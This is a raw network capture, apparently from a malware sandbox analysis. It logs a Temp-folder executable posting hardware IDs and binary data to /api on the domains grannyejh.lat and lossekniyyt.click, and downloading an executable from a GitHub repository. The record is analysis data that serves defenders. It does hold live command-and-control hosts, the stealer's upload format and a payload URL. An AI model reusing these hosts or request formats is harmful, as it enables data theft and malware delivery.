2024-12-19 09:11:39 UTC	1369	IN	Data Raw: 37 4c 78 35 67 48 57 63 44 72 41 48 76 39 66 49 6e 59 6a 74 4a 73 69 47 4b 44 58 4f 49 68 41 5a 68 38 58 68 67 55 50 4a 4d 4f 51 75 2f 75 6a 55 70 38 2b 65 59 59 59 35 68 64 79 4e 67 4f 64 6a 54 4d 6a 72 64 4d 71 7a 6c 51 72 44 46 69 47 44 30 74 38 69 4a 79 39 38 72 52 63 6e 33 59 7a 7a 78 2f 36 58 53 64 78 4a 62 75 53 4a 42 57 74 31 44 61 4f 52 32 6f 53 45 49 34 48 43 79 75 49 32 66 58 36 76 68 6e 4f 50 68 66 4e 43 64 39 5a 49 57 52 6c 6f 64 45 34 55 61 54 63 63 64 59 4c 61 78 77 5a 69 51 30 48 4c 4d 79 46 74 66 61 76 56 70 64 78 4e 38 55 65 39 46 38 34 63 43 57 31 6c 79 59 5a 70 39 34 6a 6a 30 51 6c 57 31 69 47 47 30 74 38 69 4b 61 6a 2b 71 46 57 31 46 63 77 33 52 37 30 56 43 46 36 5a 61 48 52 4f 46 47 6b 33 48 48 57 43 32 67 5a 46 59 55 52 42 79 54 49 Data Ascii: 7Lx5gHWcDrAHv9fInYjtJsiGKDXOIhAZh8XhgUPJMOQu/ujUp8+eYYY5hdyNgOdjTMjrdMqzlQrDFiGD0t8iJy98rRcn3Yzzx/6XSdxJbuSJBWt1DaOR2oSEI4HCyuI2fX6vhnOPhfNCd9ZIWRlodE4UaTccdYLaxwZiQ0HLMyFtfavVpdxN8Ue9F84cCW1lyYZp94jj0QlW1iGG0t8iKaj+qFW1Fcw3R70VCF6ZaHROFGk3HHWC2gZFYURByTI
2024-12-19 09:11:39 UTC	1369	IN	Data Raw: 5a 53 6d 48 73 32 79 68 58 35 57 54 68 33 4c 37 4b 65 4a 68 61 6f 77 6a 71 63 51 47 30 57 46 6f 6b 4b 43 79 72 49 6c 72 6a 39 35 68 66 57 65 53 2b 47 52 37 35 79 43 57 45 7a 74 4e 30 43 42 72 58 61 4e 6f 4a 64 62 68 51 62 6c 77 34 62 5a 49 62 58 70 50 71 33 47 63 35 6f 4a 39 45 59 34 52 6b 7a 4e 69 4b 79 33 33 6c 52 71 4e 38 2f 67 30 42 68 48 42 32 4a 41 41 34 68 77 70 75 35 2f 4b 35 51 6e 48 73 79 77 42 58 39 57 53 56 33 4b 62 71 57 4c 78 6a 6a 6e 6e 47 4a 55 79 56 4e 57 4c 63 54 44 44 7a 46 68 2f 66 50 70 55 69 48 61 7a 72 57 47 62 78 34 4b 58 6f 6d 75 35 67 78 55 62 79 65 4b 4d 35 4d 61 56 56 41 77 51 4d 50 4b 4d 75 51 75 2f 4b 72 56 70 46 31 4f 4d 77 52 37 46 67 76 66 69 6d 32 6b 6a 4d 62 71 63 49 34 68 30 5a 72 48 51 71 43 51 30 56 6b 7a 34 2f 31 70 Data Ascii: ZSmHs2yhX5WTh3L7KeJhaowjqcQG0WFokKCyrIlrj95hfWeS+GR75yCWEztN0CBrXaNoJdbhQblw4bZIbXpPq3Gc5oJ9EY4RkzNiKy33lRqN8/g0BhHB2JAA4hwpu5/K5QnHsywBX9WSV3KbqWLxjjnnGJUyVNWLcTDDzFh/fPpUiHazrWGbx4KXomu5gxUbyeKM5MaVVAwQMPKMuQu/KrVpF1OMwR7Fgvfim2kjMbqcI4h0ZrHQqCQ0Vkz4/1p
2024-12-19 09:11:39 UTC	1369	IN	Data Raw: 38 42 74 41 53 37 6c 51 76 63 52 75 41 6b 53 59 46 70 4e 34 33 6a 67 73 72 56 52 66 42 57 7a 4a 6b 67 4e 65 4b 73 2b 5a 42 31 69 5a 33 38 78 7a 77 57 53 31 67 4e 50 4f 38 4e 67 65 70 79 33 4f 6f 54 48 51 63 44 6f 77 52 53 32 71 49 6b 66 57 6c 39 68 66 57 65 69 61 47 52 36 34 46 63 53 4e 32 36 63 39 7a 44 75 33 4a 63 5a 67 4c 50 55 64 57 77 52 46 4c 66 49 6a 51 74 75 2b 30 58 35 56 6f 4e 49 45 68 77 48 63 68 59 43 53 7a 6c 43 30 76 6e 63 55 79 67 45 56 69 41 77 6e 42 54 55 73 72 69 4d 2b 4d 76 65 34 5a 71 54 42 33 33 6c 2b 6d 46 78 39 31 4b 37 43 59 4e 77 44 75 38 44 71 59 53 6d 67 65 46 4d 4d 43 42 6a 54 50 31 2f 75 39 6f 42 6e 4f 4c 6e 6d 47 47 2b 38 58 63 69 5a 33 35 63 70 79 52 76 4f 43 4c 73 42 53 4a 51 4e 59 32 56 46 46 5a 4e 72 58 37 62 33 68 57 6f Data Ascii: 8BtAS7lQvcRuAkSYFpN43jgsrVRfBWzJkgNeKs+ZB1iZ38xzwWS1gNPO8Ngepy3OoTHQcDowRS2qIkfWl9hfWeiaGR64FcSN26c9zDu3JcZgLPUdWwRFLfIjQtu+0X5VoNIEhwHchYCSzlC0vncUygEViAwnBTUsriM+Mve4ZqTB33l+mFx91K7CYNwDu8DqYSmgeFMMCBjTP1/u9oBnOLnmGG+8XciZ35cpyRvOCLsBSJQNY2VFFZNrX7b3hWo
2024-12-19 09:11:39 UTC	1369	IN	Data Raw: 44 76 31 58 49 54 5a 72 2f 70 6c 68 53 66 47 65 63 59 70 61 4a 55 31 49 30 31 68 65 64 35 2f 48 35 2b 4c 6f 51 4e 5a 6f 64 35 35 4e 73 42 63 34 4e 6e 33 2b 32 43 49 44 73 64 59 79 6d 45 67 69 4b 79 61 6e 41 41 77 69 79 35 6d 69 37 4f 52 32 6c 58 55 37 79 68 6a 6f 61 52 52 6a 4a 72 43 52 4a 67 65 79 6b 48 2f 4f 52 43 56 4e 49 63 45 53 41 53 4f 45 33 2f 6e 73 74 56 65 64 61 44 43 47 49 4c 41 58 4d 6a 5a 39 2f 71 6f 69 48 36 33 58 4a 35 38 47 51 78 59 66 68 77 41 46 4d 39 6e 58 2b 37 32 67 47 63 34 73 65 59 59 62 37 78 64 79 4a 6e 66 6c 79 6e 4a 47 38 34 49 75 77 46 49 6c 41 31 6a 5a 55 45 56 6b 32 74 66 74 76 65 46 58 6d 33 38 30 79 42 7a 73 52 53 78 31 4d 37 33 59 48 79 2b 47 33 54 79 4c 52 57 49 72 4a 71 41 4a 47 79 6e 48 6b 49 76 44 6b 55 69 52 62 6e 58 Data Ascii: Dv1XITZr/plhSfGecYpaJU1I01hed5/H5+LoQNZod55NsBc4Nn3+2CIDsdYymEgiKyanAAwiy5mi7OR2lXU7yhjoaRRjJrCRJgeykH/ORCVNIcESASOE3/nstVedaDCGILAXMjZ9/qoiH63XJ58GQxYfhwAFM9nX+72gGc4seYYb7xdyJnflynJG84IuwFIlA1jZUEVk2tftveFXm380yBzsRSx1M73YHy+G3TyLRWIrJqAJGynHkIvDkUiRbnX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	50094	172.67.179.109	443	3924	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:32 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=A3JDBJNAZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15051 Host: grannyejh.lat
2024-12-19 09:11:32 UTC	15051	OUT	Data Raw: 2d 2d 41 33 4a 44 42 4a 4e 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 33 4a 44 42 4a 4e 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 33 4a 44 42 4a 4e 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 41 33 4a 44 42 4a 4e 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 Data Ascii: --A3JDBJNAZContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--A3JDBJNAZContent-Disposition: form-data; name="pid"2--A3JDBJNAZContent-Disposition: form-data; name="lid"PsFKDg--pablo--A3JDBJNAZContent-Disp

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.6	50097	104.21.12.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:36 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RZTKXQ9EZPVRZNOW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12842 Host: lossekniyyt.click
2024-12-19 09:11:36 UTC	12842	OUT	Data Raw: 2d 2d 52 5a 54 4b 58 51 39 45 5a 50 56 52 5a 4e 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 5a 54 4b 58 51 39 45 5a 50 56 52 5a 4e 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 5a 54 4b 58 51 39 45 5a 50 56 52 5a 4e 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 39 5a 31 63 79 63 2d 2d 0d 0a 2d 2d 52 5a 54 4b 58 51 39 Data Ascii: --RZTKXQ9EZPVRZNOWContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--RZTKXQ9EZPVRZNOWContent-Disposition: form-data; name="pid"2--RZTKXQ9EZPVRZNOWContent-Disposition: form-data; name="lid"9Z1cyc----RZTKXQ9
2024-12-19 09:11:47 UTC	1144	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=je5ukspv0v1bh4lm4g646pg943; expires=Mon, 14 Apr 2025 02:58:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WS2c3tVtVC4euMgb%2F99NhbdXZ5lmY79ZsNtLW00hGyI1%2FH5ZxG1Tn%2FKTKd%2F0PinR%2BOo6T8%2BNso89ZJww86fa%2B%2F8Gw5OY1AT4YRJ0DlaSnGK5pH53cZitc4mlCfy1j1AI7q0cg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4644282bf77cb2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1965&rtt_var=748&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13781&delivery_rate=1451292&cwnd=216&unsent_bytes=0&cid=ebcdcfb6680c0878&ts=10781&x=0"
2024-12-19 09:11:47 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:11:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	50117	172.67.179.109	443	3924	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:41 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VUTH8ZBR0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19909 Host: grannyejh.lat
2024-12-19 09:11:41 UTC	15331	OUT	Data Raw: 2d 2d 56 55 54 48 38 5a 42 52 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 55 54 48 38 5a 42 52 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 55 54 48 38 5a 42 52 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 56 55 54 48 38 5a 42 52 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 Data Ascii: --VUTH8ZBR0Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--VUTH8ZBR0Content-Disposition: form-data; name="pid"3--VUTH8ZBR0Content-Disposition: form-data; name="lid"PsFKDg--pablo--VUTH8ZBR0Content-Disp
2024-12-19 09:11:41 UTC	4578	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e 8d a5 f6 Data Ascii: 2+?2+?o?Mp5p_oI
2024-12-19 09:11:51 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3oil94v96ev15iuphl2hcgih9k; expires=Mon, 14 Apr 2025 02:58:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2FpIG9Hs4vPx1HHmtGaIZC745adQErP217qndy85Qi3090yP4rJq93qk98TmTFU%2Fm%2FnpxV9Y148uKfhWk16pwJfHnJzFX8Z3BhEdJyN2lw9o0%2FQBdgnte5HNIMhwLAEs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4644424cbe42a0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1578&rtt_var=598&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2829&recv_bytes=20859&delivery_rate=1819314&cwnd=225&unsent_bytes=0&cid=fd4e650a32d39fd9&ts=10983&x=0"
2024-12-19 09:11:51 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:11:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.6	50136	104.21.12.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:48 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6OGRAAKWZDQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15058 Host: lossekniyyt.click
2024-12-19 09:11:48 UTC	15058	OUT	Data Raw: 2d 2d 36 4f 47 52 41 41 4b 57 5a 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 4f 47 52 41 41 4b 57 5a 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4f 47 52 41 41 4b 57 5a 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 39 5a 31 63 79 63 2d 2d 0d 0a 2d 2d 36 4f 47 52 41 41 4b 57 5a 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --6OGRAAKWZDQContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--6OGRAAKWZDQContent-Disposition: form-data; name="pid"2--6OGRAAKWZDQContent-Disposition: form-data; name="lid"9Z1cyc----6OGRAAKWZDQContent-D
2024-12-19 09:12:03 UTC	1130	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gtegi6751j7d9bohtb3rvj9p8u; expires=Mon, 14 Apr 2025 02:58:28 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3nqHI30gFabeXpTy30HNfDQWxVkCO498mWXmKBTIxUclvFFAy1InPnRNZRXPoxCZqaPMsJ1aJBUOUS%2FsYgxthb4VOix5DGghHOASFW7ix9mRuXlzLN34duighYZazkz3tPgoPw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464473f8aa8c59-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=1996&rtt_var=786&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2843&recv_bytes=15992&delivery_rate=1360037&cwnd=196&unsent_bytes=0&cid=dd4fd9c9b781fe67&ts=14699&x=0"
2024-12-19 09:12:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:12:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.6	50137	20.233.83.145	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:51 UTC	117	OUT	GET /Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1 Host: github.com Connection: Keep-Alive
2024-12-19 09:11:52 UTC	568	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Thu, 19 Dec 2024 09:11:51 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: Location: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-12-19 09:11:52 UTC	3380	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.6	50139	185.199.111.133	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:53 UTC	128	OUT	GET /Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-12-19 09:11:54 UTC	903	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1275904 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/octet-stream ETag: "f6e395433fd455488d8d231a7e135bc540ae3f4d4024c956534b849ab403e860" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: EFF0:23E71A:3EE413:472881:6763E357 Accept-Ranges: bytes Date: Thu, 19 Dec 2024 09:11:54 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740036-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1734599514.900853,VS0,VE127 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 8fb5c9c1ae4e0cbeddb37996e810bc9a3b36c0b8 Expires: Thu, 19 Dec 2024 09:16:54 GMT Source-Age: 0
2024-12-19 09:11:54 UTC	1378	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 19 00 ec 03 00 00 ac 00 00 00 00 00 00 f7 78 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 3b 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 50 2d 00 14 02 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gx@;@ P-
2024-12-19 09:11:54 UTC	1378	IN	Data Raw: 0e 7f 54 d0 cc 87 8b 5f c6 42 59 ee 49 48 fd cb 31 5a 82 d1 c3 d1 61 9b 5e fd 57 db b5 b5 3e 51 67 3b 63 af 11 89 31 1a d4 8b 30 57 33 eb 43 43 55 52 38 e5 c0 b6 d6 b0 63 62 2f 79 94 1a 5e cd f2 ad bd e1 46 7c 66 5c 7a 31 d1 ec dd a3 d0 59 5a 9f 30 3a d4 e6 44 00 91 39 74 0d 99 51 63 9f cc 9c 97 3b f9 ac 97 9e a7 ca d2 eb 15 06 c6 ec 0b 1e 17 48 a8 63 4e c6 12 ba 90 93 2c 12 d4 60 e7 30 25 88 e3 c5 af 0b cf f9 9a cc b8 c5 01 11 0c 2d a2 23 67 22 ae fd 24 1e 22 09 af b9 11 d9 5a c1 d6 49 52 12 f8 5f 8f 3c ff 3b f7 2d 2c 05 47 96 1a 12 16 70 77 7a 70 f0 1a 01 69 13 c8 14 ab e9 86 13 f7 89 f8 82 34 08 51 9d 20 75 f4 ff 41 f5 60 19 d3 4b 0f 23 84 dd 8a 6c 32 8d 7b 77 55 43 8e a4 a1 bb 9a 1a 24 ae d3 81 76 6f 95 35 dc 6c 55 4a f1 81 d5 4d d9 84 ac 87 69 f4 e5 Data Ascii: T_BYIH1Za^W>Qg;c10W3CCUR8cb/y^F\|f\z1YZ0:D9tQc;HcN,`0%-#g"$"ZIR_<;-,Gpwzpi4Q uA`K#l2{wUC$vo5lUJMi
2024-12-19 09:11:54 UTC	1378	IN	Data Raw: 9d e9 c8 ac a2 4e 78 1f 42 08 1d dd 91 fb e3 c4 d3 53 70 95 d8 12 55 99 4d d4 5a 23 46 b1 1f 5a 91 5f a3 af 50 e5 26 cb 28 18 67 eb 6f 3e 0a 95 e8 c2 9d 99 43 e7 53 1b 05 00 3f 0a ba 73 e3 b7 09 81 eb 04 48 7e 49 67 aa 91 73 7f c7 31 36 f1 2b b3 03 b6 7f 5e db 8e a4 13 e3 ed 8d 45 99 30 89 56 fa 11 dd 91 37 75 73 5c fe 7d 7c 9b 89 d5 a5 70 e5 01 37 56 22 a0 b1 63 5e 42 af 07 ac de 33 9d 7a 20 8e 8d 06 6f c9 75 94 3c b4 5b 4a 6a a5 54 95 f6 18 af a0 5b 6a 58 3a d2 81 26 92 ee 17 7a 24 fe ee 41 22 31 80 ff df c8 a8 cb c5 9e e9 4f 60 4a 2b 75 e6 44 1b 86 ac 35 53 46 ce bd 29 49 5f 09 e4 89 17 b8 86 90 44 de 65 35 64 cb dc d3 85 46 40 49 55 96 da 32 4a e3 91 48 16 80 69 05 54 20 47 88 f4 e1 2e 1f ff 11 6d 87 93 62 b9 a2 12 95 ee 55 17 0a f8 2f 9a 2c 46 66 a0 Data Ascii: NxBSpUMZ#FZ_P&(go>CS?sH~Igs16+^E0V7us\}\|p7V"c^B3z ou<[JjT[jX:&z$A"1O`J+uD5SF)I_De5dF@IU2JHiT G.mbU/,Ff
